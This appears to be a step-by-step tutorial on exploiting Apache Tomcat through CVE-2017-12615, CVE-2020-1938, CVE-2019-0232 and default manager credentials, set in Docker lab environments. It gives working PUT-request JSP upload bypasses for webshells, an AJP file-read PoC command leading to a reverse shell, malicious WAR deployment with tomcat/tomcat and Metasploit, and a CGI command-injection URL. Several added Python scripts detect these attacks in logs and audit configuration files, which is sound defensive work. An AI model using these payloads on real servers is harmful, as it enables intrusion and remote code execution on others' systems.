How to Exploit Critical Tomcat Vulnerabilities (CVE‑2017‑12615, CVE‑2020‑1938, CVE‑2019‑0232) Step‑by‑Step

This guide introduces Apache Tomcat, explains the mechanics of several high‑severity CVEs—including arbitrary file write, AJP file inclusion, and CGI RCE—provides detailed reproduction steps with Docker, command‑line payloads, and code snippets, and demonstrates how to gain remote shells via weak credentials and war deployment.


Introduction

Tomcat is a core project of the Apache Software Foundation's Jakarta initiative, jointly developed by Apache, Sun and many contributors. With Sun's involvement, Tomcat quickly adopts the latest Servlet and JSP specifications; Tomcat 5 supports Servlet 2.4 and JSP 2.0. Its advanced technology, stable performance and zero cost make it popular among Java developers and some software vendors as a lightweight web‑application server.

Tomcat runs as an independent process and can be used alongside Apache HTTP Server; when configured correctly Apache serves static HTML while Tomcat handles JSP and Servlet requests. Tomcat’s static‑file handling is weaker than Apache’s. The latest Tomcat version referenced in the article is 10.0.5.

CVE-2017-12615

This vulnerability allows arbitrary file write in Tomcat 7.0.0‑7.0.81 when the readonly attribute in conf/web.xml is set to false. The misconfiguration enables HTTP PUT uploads of any file (except files with a .jsp extension).

Vulnerability mechanics

Because readonly is set to false in conf/web.xml, an attacker can use the HTTP PUT method to upload arbitrary files, though JSP uploads are initially blocked.

On Windows, setting readonly to false allows a JSP file to be created via PUT and executed.

Reproduction

Using the vulhub Docker environment, start the target:

sudo docker-compose up -d

Enter the container and inspect conf/web.xml to confirm that readonly is set to false (the -A1 shows the param-value line that follows the param-name):

sudo docker exec -ti ec bash
grep -A1 readonly conf/web.xml

Upload a test file via PUT:

PUT /test.txt HTTP/1.1
testpoc

The server returns 201, indicating success. The uploaded file can be verified inside the container’s webapps/ROOT directory.

Three bypass methods for uploading a JSP payload are demonstrated:

Appending a space (%20) to the filename on Windows (e.g., PUT /a001.jsp%20 HTTP/1.1).

Using a trailing slash (e.g., PUT /a001.jsp/ HTTP/1.1).

Appending the NTFS stream delimiter ::$DATA (e.g., PUT /a001.jsp::$DATA HTTP/1.1).

Each method results in a 201 response and the JSP file appears in the container, allowing execution of a webshell.
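As an added defensive example (not part of the original write-up), the following Python scans Tomcat access-log lines for PUT uploads and flags the three JSP-suffix variants listed above, separating attempts that were stored (201/204) from rejected ones; the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Tomcat's default AccessLogValve pattern
# (%h %l %u %t "%r" %s %b); they are not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2021:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 1234
10.0.0.9 - - [12/May/2021:10:01:07 +0000] "PUT /test.txt HTTP/1.1" 201 -
10.0.0.9 - - [12/May/2021:10:01:09 +0000] "PUT /a001.jsp HTTP/1.1" 404 -
10.0.0.9 - - [12/May/2021:10:01:11 +0000] "PUT /a001.jsp/ HTTP/1.1" 201 -
10.0.0.9 - - [12/May/2021:10:01:13 +0000] "PUT /a001.jsp%20 HTTP/1.1" 201 -
10.0.0.9 - - [12/May/2021:10:01:15 +0000] "PUT /a001.jsp::$DATA HTTP/1.1" 201 -
"""
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
# The three suffix tricks from the write-up, checked after URL-decoding:
# trailing whitespace (%20), trailing slash, and the NTFS ::$DATA stream.
JSP_BYPASS_RE = re.compile(r'\.jspx?(\s+|/|::\$DATA)$', re.IGNORECASE)


def classify_put(method, path, status):
    """Label one request: 'kind:outcome' for PUTs, None for everything else."""
    if method != "PUT":
        return None
    decoded = unquote(path)
    if JSP_BYPASS_RE.search(decoded):
        kind = "jsp-bypass"
    elif decoded.lower().endswith((".jsp", ".jspx")):
        kind = "jsp-direct"
    else:
        kind = "put"
    # 201 (created) or 204 (overwritten) means DefaultServlet stored the file.
    outcome = "stored" if status in (201, 204) else "rejected"
    return f"{kind}:{outcome}"


def scan_access_log(text):
    """Return (host, raw_path, label) for every PUT request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        label = classify_put(m["method"], m["path"], int(m["status"]))
        if label is not None:
            findings.append((m["host"], m["path"], label))
    return findings
```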

CVE-2020-1938

This is the Tomcat AJP file‑inclusion vulnerability discovered by LongTreat security researchers. The flaw resides in the AJP connector (default port 8009) and permits reading or including any file under webapps, potentially leading to remote code execution when combined with file‑upload functionality.

Vulnerability mechanics

Tomcat configures two connectors: HTTP (default 8080) and AJP (default 8009). The AJP processor extracts request attributes and passes them to the servlet engine. By manipulating attributes such as javax.servlet.include.request_uri, an attacker can force Tomcat to include arbitrary files.

Reproduction

Start the Docker environment for CVE‑2020‑1938, then run a Python PoC to enumerate files via the AJP port:

git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
cd CNVD-2020-10487-Tomcat-Ajp-lfi
python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 192.168.1.8 -p 8009 -f /WEB-INF/web.xml

After confirming file read access, a reverse shell payload is uploaded as test.txt and executed via a bash reverse‑shell command. The payload is then delivered to the target using the AJP connector, resulting in an interactive shell.
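An added example, not from the original post, of auditing server.xml for the AJP exposure described above: it flags an AJP connector that listens on every interface or carries no shared secret. The server.xml and the hardened connector string are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed server.xml (not from the original post): the AJP connector as
# releases before the Ghostcat fix shipped it, on every interface, no secret.
SAMPLE_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>
"""
# The same connector the way it should look if AJP is genuinely needed.
HARDENED_CONNECTOR = ('<Connector port="8009" protocol="AJP/1.3" address="127.0.0.1" '
                      'secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"/>')

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml):
    """Return (port, finding) tuples for every AJP connector that is enabled."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        # A Connector without a protocol attribute is HTTP; only AJP matters here.
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address not in LOOPBACK:
            where = address or "all interfaces"
            findings.append((port, f"AJP reachable on {where}: bind to 127.0.0.1 or remove the connector"))
        # secretRequired defaults to true since 9.0.31 / 8.5.51 / 7.0.100; an
        # explicit false, or no secret on an older build, keeps the port open.
        if conn.get("secretRequired", "true").lower() == "false":
            findings.append((port, "secretRequired=\"false\" disables the AJP shared secret"))
        elif not conn.get("secret"):
            findings.append((port, "no secret attribute: pre-fix releases accept any AJP client"))
    return findings
```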

Weak credentials & remote WAR deployment

Tomcat 8 ships with default manager credentials tomcat/tomcat. Attackers can log into http://<IP>:8080/manager/html, upload a malicious WAR (e.g., test.war containing ice.jsp), and obtain a webshell.

Steps:

Start the Tomcat 8 Docker container.

Access the manager UI with the default credentials.

Upload the crafted WAR file.

Visit the deployed context to trigger the shell (e.g., via IceSpear).

Metasploit’s exploit/multi/http/tomcat_mgr_upload module can automate this process, delivering a java/jsp_shell_reverse_tcp payload.
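As an added example (not from the original post), a check for the weak-credential condition above: it parses conf/tomcat-users.xml and reports any account holding a manager or admin role whose password equals its username, sits on a small deny-list, or is short. The users file and the deny-list are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed conf/tomcat-users.xml (not from the original post) containing the
# tomcat/tomcat manager account the write-up logs in with.
SAMPLE_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Rk4!vq7Lm2#Xp9Zt" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="probe"/>
</tomcat-users>
"""

# Roles that can deploy or manage applications through /manager and /host-manager.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                "admin-gui", "admin-script"}
# Assumed short deny-list for the example; a real audit would use a larger one.
WEAK_PASSWORDS = {"tomcat", "admin", "password", "123456", "s3cret", "manager", "root"}


def audit_tomcat_users(users_xml):
    """Return (username, finding) for every privileged account with a weak secret."""
    findings = []
    for el in ET.fromstring(users_xml).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        # MemoryUserDatabase accepts either username= or name= on <user>.
        name = el.get("username") or el.get("name") or ""
        pwd = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",")}
        if not roles & DEPLOY_ROLES:
            continue  # cannot deploy a WAR, out of scope for this check
        if pwd.lower() == name.lower() or pwd.lower() in WEAK_PASSWORDS:
            findings.append((name, "default or deny-listed password on a manager account"))
        elif len(pwd) < 12:
            findings.append((name, "manager password shorter than 12 characters"))
    return findings
```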

CVE-2019-0232

This Tomcat CGI servlet RCE vulnerability arises when enableCmdLineArguments is true and executable is empty. On Windows, Runtime.exec ultimately invokes CreateProcess, which concatenates arguments into a command line and runs cmd.exe without proper escaping, allowing arbitrary command execution.

Vulnerability mechanics

The CGI servlet reads URL parameters, builds a command line, and executes it. When the target is a .bat file on Windows, the command line becomes cmd.exe /c "file.bat & dir", enabling command injection.

Reproduction

Enable the CGI servlet in conf/web.xml by uncommenting the servlet definition and adding:

<init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>
<init-param><param-name>executable</param-name><param-value></param-value></init-param>

Map the servlet to /cgi-bin/* and set privileged="true" in conf/context.xml. Create WEB-INF/cgi-bin/hello.bat with a simple command (e.g., calc.exe) and restart Tomcat. Access

http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

to trigger the payload.
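Covering both the readonly=false setting from the CVE-2017-12615 section and the CGI servlet settings just shown, an added example (not from the original post) that audits a conf/web.xml for the two servlet configurations; the web.xml excerpt is constructed for the example and carries both misconfigurations.

```python
import xml.etree.ElementTree as ET

# Constructed conf/web.xml excerpt (not from the original post) combining
# DefaultServlet readonly=false and a CGI servlet with an empty executable.
SAMPLE_WEB_XML = """\
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param><param-name>enableCmdLineArguments</param-name><param-value>true</param-value></init-param>
    <init-param><param-name>executable</param-name><param-value></param-value></init-param>
  </servlet>
</web-app>
"""

def _local(tag):
    """Drop the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]

def _init_params(servlet):
    """Collect <init-param> name/value pairs of one <servlet> element."""
    params = {}
    for child in servlet:
        if _local(child.tag) == "init-param":
            fields = {_local(c.tag): (c.text or "").strip() for c in child}
            params[fields.get("param-name", "")] = fields.get("param-value", "")
    return params

def audit_web_xml(web_xml):
    """Return finding strings for the two risky servlet settings."""
    findings = []
    for servlet in ET.fromstring(web_xml):
        if _local(servlet.tag) != "servlet":
            continue
        cls = "".join(c.text or "" for c in servlet if _local(c.tag) == "servlet-class").strip()
        params = _init_params(servlet)
        # readonly defaults to true; false lets PUT/DELETE write into webapps.
        if cls.endswith("DefaultServlet") and params.get("readonly", "true").lower() == "false":
            findings.append("DefaultServlet readonly=false (CVE-2017-12615)")
        # Unset enableCmdLineArguments meant true before the fix; executable defaults to perl.
        if (cls.endswith("CGIServlet")
                and params.get("enableCmdLineArguments", "true").lower() == "true"
                and not params.get("executable", "perl")):
            findings.append("CGIServlet enableCmdLineArguments=true with empty executable (CVE-2019-0232)")
    return findings
```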

These examples illustrate how misconfigurations and default settings in Tomcat can be leveraged for remote code execution, file inclusion, and privilege escalation.
